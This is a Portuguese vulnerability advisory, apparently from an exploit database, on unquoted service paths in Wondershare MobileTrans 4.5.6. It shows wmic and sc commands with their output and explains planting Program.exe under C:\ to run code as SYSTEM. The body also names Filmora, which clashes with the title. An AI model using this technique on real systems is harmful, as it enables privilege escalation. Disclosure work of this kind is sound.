
Wondershare MobileTrans 4.5.6 - Caminho de Serviço Não Entre Aspas
Wondershare MobileTrans 4.5.6 - Caminho de Serviço sem Aspas
As versões 4.5.6 e inferiores do Wondershare Filmora contêm múltiplos caminhos de serviço sem aspas que permitem a atacantes escalar privilégios para o nível de sistema.
Caminho do binário do serviço WsAppService3: C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Caminho do binário do serviço ElevationService: C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
C:\Windows\system32>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto
Wondershare Application Update Service 3.0 WsAppService3 C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto
C:\Windows\system32>sc qc WsAppService3
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WsAppService3
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Application Update Service 3.0
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\Windows\system32>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Se um usuário malicioso tiver permissões de gravação em qualquer um dos caminhos com espaços, ele pode colocar um executável malicioso nessa pasta e executar código como SYSTEM. Por exemplo, considere que temos um usuário com baixos privilégios e permissões de gravação em C:, então podemos colocar um executável malicioso chamado Program.exe no caminho C:\ e, após a reinicialização, o serviço executará o payload como SYSTEM.